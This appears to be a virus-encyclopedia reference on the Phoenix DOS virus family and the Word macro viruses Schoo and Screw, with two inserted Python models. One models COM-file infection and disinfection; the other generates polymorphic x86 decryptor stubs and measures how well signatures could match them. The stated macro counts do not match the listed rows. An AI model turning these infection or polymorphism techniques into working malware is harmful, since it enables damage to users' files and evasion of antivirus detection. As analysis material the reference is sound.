Phoenix Family
Description Phoenix Family
These are very dangerous resident polymorphic parasitic viruses. They write themselves into the middle of COM files that are executed or closed. To EXE files they append a trojan program that in some cases erases all information on the installed hard disks. "Phoenix.Proud" and "Phoenix.Live" infect COM files only; "Phoenix.Live.a" does not infect COMMAND.COM.

While infecting a COM file the virus reads the data from the middle of the file, saves it at the end of the file, overwrites the middle of the file with its own copy, and writes a JMP to the virus at the beginning of the file. While infecting COMMAND.COM the virus writes itself into the stack area of COMMAND.COM, so the file length does not grow.

      Infection of a COM file             Infection of COMMAND.COM

   +-----------+     +-----------+      +-----------+     +-----------+
   |   File    |     |   File    |      |COMMAND.COM|     |COMMAND.COM|
   |           |     |           |      |           |     |           |
   + - - - - - +     +-----------+      + - - - - - +     +-----------+
   |           |--+  |   Virus   |      |  (stack)  |     |   Virus   |
   + - - - - - +  |  +-----------+      + - - - - - +     +-----------+
   |           |  |  |           |      +-----------+     +-----------+
   +-----------+  |  +-----------+
                  +->|  (moved)  |
                     +-----------+
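The two COM layouts described above, as an added example in Python that is not Phoenix's code: infect_com produces the middle-overwrite layout (displaced bytes appended to the end) for an ordinary COM file and the in-place layout for a host that ends in a zero-filled stack area, and disinfect_com undoes either, which is the same data movement the virus itself has to perform in memory before passing control to the host. The 9-byte header the model stores at the start of the virus body (marker, mode, length, the host's original first three bytes), the marker "PHX" and the rule for picking the "middle" are assumptions of the model, not Phoenix's layout.

```python
"""Model of Phoenix-style COM infection and the matching disinfection.

Added example, not Phoenix's own code. The header layout, the "PHX" marker
and the choice of the middle offset are assumptions made so that the model
can undo the infection; the real virus keeps this data elsewhere.
"""
import struct

COM_LOAD = 0x100              # COM images are loaded at CS:0100h
JMP_NEAR = 0xE9               # JMP rel16
MARK = b"PHX"                 # constructed marker for this model only
MODE_MIDDLE, MODE_STACK = 0, 1
HDR = struct.Struct("<3sBH3s")  # marker, mode, virus length, host's original first 3 bytes


def jmp_target(image, at=0):
    """Decode a JMP rel16 at file offset `at`; return the file offset it lands on."""
    if len(image) < at + 3 or image[at] != JMP_NEAR:
        return None
    (rel,) = struct.unpack_from("<h", image, at + 1)
    return at + 3 + rel


def parse_header(image):
    """Return (mode, virus_len, first3, virus_off) if `image` carries the model virus."""
    off = jmp_target(image)
    if off is None or off < 3 or off + HDR.size > len(image):
        return None
    mark, mode, vlen, first3 = HDR.unpack_from(image, off)
    if mark != MARK or off + vlen > len(image):
        return None
    return mode, vlen, first3, off


def infect_com(host, payload):
    """Return the infected image, or `host` unchanged if it is too small or already infected."""
    if parse_header(host) is not None:
        return host
    vlen = HDR.size + len(payload)
    if len(host) < vlen + 3:
        return host
    if host.endswith(bytes(vlen)):
        # COMMAND.COM case: a zero-filled tail (the modelled stack area) is
        # overwritten in place, so the file length does not change.
        mode, off = MODE_STACK, len(host) - vlen
    else:
        # Ordinary COM file: overwrite the middle, keep the displaced bytes at the end.
        mode, off = MODE_MIDDLE, 3 + (len(host) - vlen - 3) // 2
    body = HDR.pack(MARK, mode, vlen, host[:3]) + payload
    jmp = bytes([JMP_NEAR]) + struct.pack("<h", off - 3)  # rel16 from the byte after the JMP
    out = jmp + host[3:off] + body + host[off + vlen:]
    if mode == MODE_MIDDLE:
        out += host[off:off + vlen]  # displaced middle saved at the end of the file
    return out


def disinfect_com(image):
    """Undo infect_com: restore the first three bytes and put the displaced data back."""
    hdr = parse_header(image)
    if hdr is None:
        return image
    mode, vlen, first3, off = hdr
    head = first3 + image[3:off]
    if mode == MODE_STACK:
        return head + bytes(vlen)          # the stack area was zeros before infection
    saved = image[-vlen:]                  # the middle that was moved to the end
    return head + saved + image[off + vlen:-vlen]


if __name__ == "__main__":
    # Constructed host: a few real opcodes followed by non-zero filler.
    host = b"\xB4\x09\xBA\x0B\x01\xCD\x21\xC3" + bytes(range(1, 256)) * 2
    inf = infect_com(host, b"\x90" * 40)
    print("host %d bytes, infected %d bytes, virus at %#x, restored ok: %s"
          % (len(host), len(inf), jmp_target(inf), disinfect_com(inf) == host))
```

Running the block prints the file growth for the ordinary case; appending a block of zeros to the constructed host exercises the in-place COMMAND.COM path, where the length stays the same.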
The viruses also hook INT 13h and then, depending on some preconditions, randomly rearrange bytes in the blocks being read from and written to disk. This family was the first to use two new methods. First, the viruses intercept DOS file calls by hooking INT 2Ah instead of INT 21h. Second, the viruses (except "Phoenix.Live.a") are polymorphic and have no constant mask (signature): the main part of the virus is encrypted, and the decryptor (32 bytes long) is selected from 204 possible variants. Bear in mind that the viruses have the following lengths:

  "Phoenix"        - 1704 bytes
  "Phoenix.Evil"   - 1701 bytes
  "Phoenix.Proud"  - 1102 bytes

The viruses contain the text strings:

  "Phoenix":          PHOENIX
  "Phoenix.Evil":     The evil that men do lives on and on and on...
  "Phoenix.Proud":    Proudly made in Sofia
  "Phoenix.Live.a,b": Live after Death
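The polymorphic decryptor idea, as an added example that is not Phoenix's code: the body is stored encrypted with a one-byte key, and a 16-bit real-mode decryptor stub is assembled from interchangeable parts (pointer register, ALU operation, order of the two register loads), so generated copies share no long constant byte string. run_stub decodes a stub the way the CPU would and applies it, and longest_common_run measures what a byte-signature scanner could still hook onto. The 12-byte stub, its 18 structural variants and the instruction templates are assumptions of this model; Phoenix's own decryptor is 32 bytes long with 204 variants.

```python
"""Model of a polymorphic decryptor: encrypted body plus a stub assembled from
interchangeable parts. Added example, not Phoenix's decryptor; the stub
templates and the 18-variant scheme are assumptions of the model.
"""
import itertools
import struct

COM_LOAD = 0x100
# pointer register: (opcode of mov reg,imm16; ModRM r/m bits for [reg]; opcode of inc reg)
PTR = {"si": (0xBE, 4, 0x46), "di": (0xBF, 5, 0x47), "bx": (0xBB, 7, 0x43)}
# 80 /n byte [reg], imm8: the /n digit in the ModRM reg field selects the ALU operation
ALU = {"xor": 6, "add": 0, "sub": 5}
STUB_LEN = 12


def encrypt_body(body, op, key):
    """Pre-image such that `op byte [reg], key` restores the plaintext."""
    if op == "xor":
        return bytes(b ^ key for b in body)
    if op == "add":
        return bytes((b - key) & 0xFF for b in body)
    return bytes((b + key) & 0xFF for b in body)


def build_stub(reg, op, cx_first, key, body_len):
    """Assemble one 12-byte decryptor: load pointer and count, then op/inc/loop."""
    opc, rm, inc = PTR[reg]
    mov_ptr = bytes([opc]) + struct.pack("<H", COM_LOAD + STUB_LEN)  # body follows the stub
    mov_cx = b"\xB9" + struct.pack("<H", body_len)                   # mov cx, imm16
    head = mov_cx + mov_ptr if cx_first else mov_ptr + mov_cx
    alu = bytes([0x80, (ALU[op] << 3) | rm, key])                    # op byte [reg], key
    loop = b"\xE2\xFA"                                               # loop -6: back to the ALU op
    return head + alu + bytes([inc]) + loop


def generate(body, reg, op, cx_first, key):
    """One infected image: chosen stub followed by the matching encrypted body."""
    return build_stub(reg, op, cx_first, key, len(body)) + encrypt_body(body, op, key)


def run_stub(image):
    """Decode the stub as the CPU would and apply it; return the decrypted body."""
    p, reg, ptr, cx = 0, None, None, None
    for _ in range(2):
        opc = image[p]
        (imm,) = struct.unpack_from("<H", image, p + 1)
        if opc == 0xB9:
            cx = imm
        else:
            reg = {v[0]: k for k, v in PTR.items()}[opc]
            ptr = imm
        p += 3
    if reg is None or cx is None or image[p] != 0x80:
        raise ValueError("stub does not match a known template")
    modrm, key = image[p + 1], image[p + 2]
    op = {v: k for k, v in ALU.items()}[(modrm >> 3) & 7]
    if (modrm & 7) != PTR[reg][1] or image[p + 3] != PTR[reg][2] or image[p + 4:p + 6] != b"\xE2\xFA":
        raise ValueError("stub does not match a known template")
    start = ptr - COM_LOAD
    out = bytearray(image)
    for i in range(start, start + cx):
        if op == "xor":
            out[i] ^= key
        elif op == "add":
            out[i] = (out[i] + key) & 0xFF
        else:
            out[i] = (out[i] - key) & 0xFF
    return bytes(out[start:start + cx])


def all_variants(body, key):
    """Every structural variant of the stub for one body and key (3 regs x 3 ops x 2 orders)."""
    return [generate(body, r, o, c, key) for r, o, c in itertools.product(PTR, ALU, (False, True))]


def longest_common_run(stubs):
    """Length of the longest byte string present in every stub: a scanner's constant mask."""
    first = stubs[0]
    for n in range(len(first), 0, -1):
        for i in range(len(first) - n + 1):
            s = first[i:i + n]
            if all(s in other for other in stubs[1:]):
                return n
    return 0


if __name__ == "__main__":
    body = bytes(range(256)) * 2  # constructed 512-byte body
    variants = all_variants(body, 0x5A)
    for v in variants[:4]:
        print(v[:STUB_LEN].hex(" "))
    print("longest common run over %d stubs: %d bytes"
          % (len(variants), longest_common_run([v[:STUB_LEN] for v in variants])))
```

With a fixed body and key, the only run shared by all 18 stubs is the 3-byte "mov cx, imm16" counter load, which is why a real engine also varies how the counter and pointer are set up; a scanner for this model would need an emulator or a structural check rather than a byte mask.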
Macro.Word.Schoo
Description Macro.Word.Schoo
This is an encrypted virus. It contains 7 macros:

  Documents        NORMAL.DOT
  GRBack           GetRid
  AutoOpen         AutoOpen2
  FileSave         FileSave
  VerIdent2        VerIdent
  FileSaveAs       FileSaveAs
  BJTradeMark      BJTradeMark
  ToolsSpelling    ToolsSpelling

It infects the global macro area when an infected document is opened, and infects documents that are saved under a new name. The virus adds new AutoCorrect entries to Word:

  school      -> schoo'
  recognize   -> reckonize
  recognized  -> reckonized
  assembly    -> assemily
  CHS         -> Crowley High Schoo'
From 28 May 1998 on, the virus displays many message boxes, for example:

  Microsoft Word Virus Alert
  Warning: The 'Big Johnson' Virus has been detected.

On 28 May 1998 it displays the message box:

  Microsoft Word Virus Alert
  Transferring control to virus subroutine: Virus initializing...
  It's the last day of school!

On all following days it displays the message box:

  Microsoft Word Virus Alert
  Transferring control to virus subroutine: Virus initializing...
  School's out!
Macro.Word.Screw
Description Macro.Word.Screw
This macro virus contains 11 macros:

  Documents    NORMAL.DOT
  ABC          ABC
  AO           AO, AutoOpen, FileOpen, FileTemplates
  FP           FP, FilePrint
  FSA          FSA, FileSave, FileSaveAs
  HLP          HELP, HLP
  SCR          SCR
  TMC          ToolsMacro, ToolsCustomize, FileTemplates, TMC

It infects the global macro area when an infected document is opened, but contains an error: it copies a nonexistent macro AE instead of AO. As a result the virus can replicate only once, since the second generation has no AutoOpen macro. On printing, depending on the current time, the virus pastes the text "SCREW VIRUS IS HERE" at the end of the document and replaces all occurrences of:

  ' a '  ->  ' e '
  ' I '  ->  ' Me '
  '. '   ->  ' !!! '

and restores them after printing. The virus also installs a new screen saver (Marquee) that displays the message:

  You Are Infected With The Screw Virus!!!